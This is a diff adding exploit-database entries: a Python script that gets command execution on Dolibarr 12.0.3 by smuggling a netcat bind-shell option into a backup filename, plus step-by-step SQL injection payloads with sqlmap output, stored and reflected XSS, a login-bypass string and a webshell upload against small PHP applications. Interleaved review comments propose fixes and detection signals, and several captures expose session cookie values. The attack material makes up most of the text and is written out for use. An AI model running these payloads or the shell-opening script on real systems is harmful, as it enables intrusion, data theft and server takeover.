+# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is
+# vulnerable to authenticated Remote Code Execution Attack. An attacker who
+# has the access the admin dashboard can manipulate the backup function by
+# inserting payload into the zipfilename_template parameter at page
+# /admin/tools/dolibarr_export.php by clicking on the button "Generate
+# Backup" thus triggering command injection on target system.
+
+import requests
+from bs4 import BeautifulSoup
+from bs4 import Comment
+import re
+import lxml
+import json
+import urllib
+
+username = input("username: ")
+password = input("password: ")
+root_url = input("Root URL: http://192.168.0.15/ --> ")
+
+print("Exploit is sent! Check out if the bind shell on port 9999 active!")
+
+listener_port = "9999"
+
+login_url = root_url + "/index.php?mainmenu=home "
+vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"
+upload_url = root_url + "/admin/tools/export_files.php"
+
+session = requests.Session()
+request = session.get(login_url)
+
+# Get the token value
+soup = BeautifulSoup(request.text,"lxml")
+token = soup.find("input",{'name':'token'})['value']
+
+# Login
+body = {"token":token, "actionlogin":"login",
+"loginfunction":"loginfunction", "tz":"-5",
+"tz_string":"America%2FNew_York", "dst_observed":"1",
+"dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second":
+"2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664",
+"dol_hide_topmenu":"", "dol_hide_leftmenu":"",
+"dol_optimize_smallscreen":"", "dol_no_mouse_hover":"",
+"dol_use_jmobile":"", "username":username,"password":password}
+
+session.post(login_url, data=body, cookies=request.cookies)
+
+request = session.get(vulnerable_url)
+token = soup.find("input",{'name':'token'})['value']
+
+header = {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
+Gecko/20100101 Firefox/80.0",
+"Accept":"*/",
+"Accept-Encoding": "gzip, deflate",
+"Origin": root_url,
+"Referer":
+root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",
+"Upgrade-Insecure-Requests": "1"
+}
+
+body = {"token":token, "export_type":"server", "page_y":"1039",
+"zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar
+--use-compress-program='nc -c bash -nlvp  9999' %0a  :: ",
+"compression":"gz"}
+
+param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)
+
+session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)
\ No newline at end of file
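Review bot: The description calls this command injection, but the request body shows something narrower that the entry should name: the `zipfilename_template` value posted to `/admin/tools/export_files.php` carries a space and a `--use-compress-program` option, so it appears the value reaches a `tar` command line unvalidated. A comment stating the remediation belongs next to the description: accept only a strict filename pattern such as `[A-Za-z0-9._-]+` for `zipfilename_template`, and pass arguments to the archiver without a shell. For detection, a POST to `export_files.php` whose `zipfilename_template` contains whitespace or `--` is the signal visible in this script.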
diff --git a/exploits/php/webapps/49271.txt b/exploits/php/webapps/49271.txt
new file mode 100644
index 000000000..8a1238606
--- /dev/null
+++ b/exploits/php/webapps/49271.txt
@@ -0,0 +1,14 @@
+# Exploit Title:Content Management System 1.0 - 'First Name' Stored XSS
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Tested on: WINDOWS 10
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Rename the user First Name to
+"<script>alert(document.domain)</script>".
+Step 4: Update Profile and this will trigger the XSS.
+Step 5: Logout and login again and the page will display the domain name.
\ No newline at end of file
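Review bot: Neither this entry nor `49275.txt` (Customer Support System, same "Manage Account" flow) says where the stored name is rendered or how to fix it; both stop at the payload firing. From the steps, the value is presumably shown in the page header after login, so both should add a line like `# Fix: HTML-encode First Name / Last Name when rendering the logged-in user's name`. Both need only valid user credentials, and the text should say whether the name is also shown to other users, for example in an administrator's user list, since that decides whether this is self-XSS or affects others.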
diff --git a/exploits/php/webapps/49272.txt b/exploits/php/webapps/49272.txt
new file mode 100644
index 000000000..0d737b0ed
--- /dev/null
+++ b/exploits/php/webapps/49272.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Content Management System 1.0 - 'email' SQL Injection
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: WINDOWS 10
+
+Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login"
+page in burpsute
+Step 2. Save POST the packet
+Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
+request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
+--dbs "
+Step 4. This will inject successfully and you will have an information
+disclosure of all databases contents
+
+POST the packet
+---
+POST /ajax.php?action=login HTTP/1.1
+Host: 10.211.55.4
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Content-Length: 61
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
+Origin: http://10.211.55.4
+Referer: http://10.211.55.4/login.php
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123
+---
+
+SQLMAP
+---
+Parameter: email (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND
+'WlxU'='WlxU&password=admin123
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM
+(SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123
+---
\ No newline at end of file
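Review bot: This entry, `49273.txt` and `49274.txt` give only tool output as evidence and never state the root cause or a fix; each should add a line such as `# Fix: bind the parameter with a prepared statement (mysqli prepare/bind_param) instead of concatenating it into the query`. Here the injectable `email` parameter belongs to `ajax.php?action=login`, so it is presumably reachable without authentication, and the header should say so because it changes the severity. The captures in this file and in `49273.txt` include a `PHPSESSID` cookie value, which should be replaced with a placeholder. Several lines are hard-wrapped mid-token (`User-Agent` onto `Firefox/78.0`, the quoted `sqlmap` command), which looks like mail wrapping and should be undone.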
diff --git a/exploits/php/webapps/49273.txt b/exploits/php/webapps/49273.txt
new file mode 100644
index 000000000..db43ac797
--- /dev/null
+++ b/exploits/php/webapps/49273.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Content Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: WINDOWS 10
+
+Step 1. Capture the request of the "
+http://127.0.0.1/ajax.php?action=load_list" page in burpsute
+Step 2. Save POST the packet
+Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
+request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
+--dbs "
+Step 4. This will inject successfully and you will have an information
+disclosure of all databases contents
+
+POST the packet
+---
+POST /ajax.php?action=load_list HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Content-Length: 63
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
+Origin: http://127.0.0.1
+Referer:
+http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0
+---
+
+SQLMAP
+---
+Parameter: id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689
+AND 'ZPQO'='ZPQO&start=0
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT
+6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 10 columns
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL
+SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL--
+-&start=0
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49274.txt b/exploits/php/webapps/49274.txt
new file mode 100644
index 000000000..d62a45ec6
--- /dev/null
+++ b/exploits/php/webapps/49274.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-10
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Select Staff and select the view icon.
+
+Step 3. You will be redirected to a page like "
+http://localhost/pages/emp_searchfrm.php?action=edit & id=1". Or visit any
+page that has the "id" parameter. Capture the current page request in
+burpsuite
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap
+-r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE
+(SELECT 4035 UNION SELECT 6415) END))
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT
+COUNT(*),CONCAT(0x716b6a7871,(SELECT
+(ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: action=edit & id=22 AND (SELECT 4861 FROM
+(SELECT(SLEEP(5)))xiXm)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 9 columns
+    Payload: action=edit & id=22 UNION ALL SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL--
+-
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49275.txt b/exploits/php/webapps/49275.txt
new file mode 100644
index 000000000..c8740df9a
--- /dev/null
+++ b/exploits/php/webapps/49275.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any valid credentials
+
+Step 2. Click on the username in header and select "Manage Account".
+
+Step 3. On "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields.
+
+Step 4. Complete the other required details and click on save to update user information.
+
+Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/49276.txt b/exploits/php/webapps/49276.txt
new file mode 100644
index 000000000..e1a407869
--- /dev/null
+++ b/exploits/php/webapps/49276.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on Customer and select list.
+
+Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: page=edit_staff&id=1 AND 4164=4164
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 10 columns
+    Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
+---
\ No newline at end of file
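Review bot: The steps and the evidence disagree about the affected page: step 3 captures `index.php?page=edit_customer&id=2`, while every payload in the output block is for `page=edit_staff&id=1`. The entry should say which page the output was taken from, or state that both pass `id` to the query unchecked, so that a maintainer patches the right handler. A remediation line is also missing; the correction is a prepared statement with `id` bound as an integer.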
diff --git a/exploits/php/webapps/49277.txt b/exploits/php/webapps/49277.txt
new file mode 100644
index 000000000..eeb81aa67
--- /dev/null
+++ b/exploits/php/webapps/49277.txt
@@ -0,0 +1,74 @@
+# Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "Bookings" in header and select "Add Bookings".
+
+Step 3. Complete the required details and click on "Save" to save the new Bookings.
+
+Step 4. On the "Bookings" page, find your new booking/existing booking and click on the edit icon.
+
+Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite.
+
+Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
+
+Step 7. This will inject successfully and you will have an information disclosure of all databases contents.
+
+---
+
+Parameter: id (GET)
+
+    Type: boolean-based blind
+
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+
+    Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg
+
+
+
+    Type: error-based
+
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+   
+ Payload: id=2' AND (SELECT 7113 FROM(SELECT 
+COUNT(*),CONCAT(0x716a626a71,(SELECT 
+(ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM 
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP
+
+
+
+    Type: stacked queries
+
+    Title: MySQL >= 5.0.12 stacked queries (comment)
+
+    Payload: id=2';SELECT SLEEP(5)#
+
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+    Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq
+
+
+
+    Type: UNION query
+
+    Title: MySQL UNION query (NULL) - 4 columns
+
+   
+ Payload: id=-1072' UNION ALL SELECT 
+NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL#
+
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49278.txt b/exploits/php/webapps/49278.txt
new file mode 100644
index 000000000..d997212aa
--- /dev/null
+++ b/exploits/php/webapps/49278.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-09
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the application with any valid user credentials.
+
+Step 2: Click on Add New Question Page.
+
+Step 3: input "<script>alert(document.cookie)</script>" in the new question
+field and select add new question.
+
+Step 4: Once you have an XSS payload as a question in add new question
+page, click on View Questions Page.
+
+Step 5: This will trigger the XSS payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/49279.txt b/exploits/php/webapps/49279.txt
new file mode 100644
index 000000000..f720ae655
--- /dev/null
+++ b/exploits/php/webapps/49279.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-10
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Click on View Candidates page and select take exam. If there is no
+candidate, click on "Add New Candidate" page, fill details and add new
+candidate.
+
+Step 3. Click on "Take Exam" and capture the request in burpsuite.
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap
+-r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980
+UNION SELECT 3372) END))
+
+    Type: stacked queries
+    Title: MySQL >= 5.0.12 stacked queries (comment)
+    Payload: id=1;SELECT SLEEP(5)#
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49280.txt b/exploits/php/webapps/49280.txt
new file mode 100644
index 000000000..ba550882e
--- /dev/null
+++ b/exploits/php/webapps/49280.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Employee Record System 1.0 - Multiple Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-09
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the application with any valid user credentials.
+
+Step 2: Click on Add Employee.
+
+Step 3: input "<script>alert(1)</script>" in all fields except phone number
+fields. Note: increase the values of "1" in "alert(1)" to determine which
+field is vulnerable. Eg <script>alert(2)</script>,
+<script>alert(3)</script> ....etc.
+
+Step 4: Once all fields are completed, Click on ADD RECORD to save the
+record.
+
+Step 5: Click on All Employees page and this will trigger the Stored XSS.
+
+Step 6: To view all Stored XSS, after clicking on All Employees page, click
+on the View Employee Icon. This will tigger all Stored XSS payloads.
\ No newline at end of file
diff --git a/exploits/php/webapps/49281.txt b/exploits/php/webapps/49281.txt
new file mode 100644
index 000000000..17b345c98
--- /dev/null
+++ b/exploits/php/webapps/49281.txt
@@ -0,0 +1,52 @@
+# Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)
+# Date: 2020-12-14
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.phpjabbers.com
+# Software Link: https://www.phpjabbers.com/appointment-scheduler
+# Version: 2.3
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)
+# CVE: CVE-2020-35416
+
+Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.
+
+Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.
+
+PoC Request:
+GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1
+Host: [removed]
+Connection: close
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://[removed]
+Accept-Encoding: gzip, deflate
+Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422
+
+PoC Response:
+HTTP/1.1 200 OK
+Server: nginx
+Date: Thu, 14 Dec 2020 10:48:41 GMT
+Content-Type: text/html; charset=utf-8
+Connection: close
+Vary: Accept-Encoding
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+Access-Control-Allow-Methods: POST, GET, OPTIONS
+Access-Control-Allow-Headers: Origin, X-Requested-With
+Content-Length: 13988
+
+<div class="container-fluid">
+   <div class="row">
+       <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">
+           <div class="panel panel-default pjAsContainer pjAsAside">
+               <div class="panel-heading p
+...[SNIP]...
+<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>
+...[SNIP]...
\ No newline at end of file
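Review bot: The PoC request redacts the host but still publishes what appear to be real cookie values on its `Cookie:` line (`_ga`, `_gid` and the `AppointmentScheduler` session id); these should be replaced before publication, e.g. `Cookie: AppointmentScheduler=[removed]`. The response excerpt also shows `Access-Control-Allow-Origin: *` together with `Access-Control-Allow-Credentials: true`, which looks like a separate configuration weakness from the reflected `date` parameter and deserves its own sentence. The write-up shows where the value lands (the `pj-calendar-ym` element) but not the remedy; a closing line such as `Fix: HTML-encode the date and action parameters on output` would complete it.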
diff --git a/exploits/php/webapps/49282.txt b/exploits/php/webapps/49282.txt
new file mode 100644
index 000000000..608340a2c
--- /dev/null
+++ b/exploits/php/webapps/49282.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Victor CMS 1.0 - Multiple SQL Injection (Authenticated)
+# Date: 17.12.2020
+# Exploit Author: Furkan Göksel
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+# Description: The Victor CMS v1.0 application is vulnerable to SQL
+# injection in c_id parameter of admin_edit_comment.php, p_id parameter
+# of admin_edit_post.php, u_id parameter of admin_edit_user.php, edit
+# parameter of admin_update_categories.php.
+
+# Tested on: Apache2/Linux
+
+Step 1: Register the system through main page and login your account
+
+Step 2: After successful login, select one of the specified tabs
+(post, categories, comments, users)
+
+Step 3: When you click edit button of these records, an HTTP request
+is sent to server to get details of this record with corresponding
+parameters (eg. for edit comment it is c_id parameter)
+
+Step 4: Inject your SQL payload to these ids or use sqlmap to dump
+
+Example PoC request is as follows:
+
+GET /cve/admin/comment.php?source=edit_comment&c_id=2%20AND%20SLEEP(10) HTTP/1.1
+
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=st8hhobgplut500p3lpug8qa66
+Upgrade-Insecure-Requests: 1
+
+Same PoC payload is valid for all edit features of specified tabs.
\ No newline at end of file
diff --git a/exploits/php/webapps/49284.txt b/exploits/php/webapps/49284.txt
new file mode 100644
index 000000000..2ffa9620d
--- /dev/null
+++ b/exploits/php/webapps/49284.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Point of Sale System 1.0 - Authentication Bypass
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-17
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as Administrator.
+
+Step 1: On the login page, simply use { ' or 0=0 # } as username
+
+Step 2: On the login page, use same query{ ' or 0=0 # } as password
+
+All set you should be logged in as Administrator.
\ No newline at end of file
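Review bot: The `# Description:` line calls this an authentication bypass without naming the cause, although the input given in Steps 1 and 2 (`' or 0=0 #`) is a SQL tautology, which suggests the login query is built by concatenating the username and password fields; that is an inference, since the login code is not shown. I would say so in the header, e.g. `# Description: SQL injection in the login form (username and password fields) allows login as Administrator without valid credentials.`, so the entry is classified and fixed as injection. A mitigation line is missing as well, e.g. `# Mitigation: prepared statement for the credential lookup; verify the password against a stored hash`.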
diff --git a/exploits/php/webapps/49285.txt b/exploits/php/webapps/49285.txt
new file mode 100644
index 000000000..584be69f9
--- /dev/null
+++ b/exploits/php/webapps/49285.txt
@@ -0,0 +1,19 @@
+# Exploit Title:  Alumni Management System 1.0 - Unrestricted File Upload To RCE
+# Exploit Author: Aakash Madaan
+# Date: 2020-12-17
+# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "System Settings" page.
+
+Step 3. At the image upload field, browse and select any php webshell.
+Click on upload to upload the php webshell.
+
+Step 4. Visit "http://localhost/admin/assets/uploads/" and select your
+upload phpwebshell.
+
+Step 5. You should have a remote code execution.
\ No newline at end of file
diff --git a/exploits/php/webapps/49286.txt b/exploits/php/webapps/49286.txt
new file mode 100644
index 000000000..e7b97becb
--- /dev/null
+++ b/exploits/php/webapps/49286.txt
@@ -0,0 +1,19 @@
+# Exploit Title:  Alumni Management System 1.0 - "Course Form" Stored XSS
+# Exploit Author: Aakash Madaan
+# Date: 2020-12-10
+# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on the "Course List" page.
+
+Step 3. In the "Course Form" field, use XSS payload
+"<script>alert("course")</script>" as the name of new course and click on
+save.
+
+Step 4. This should trigger the XSS payload and anytime you click on the
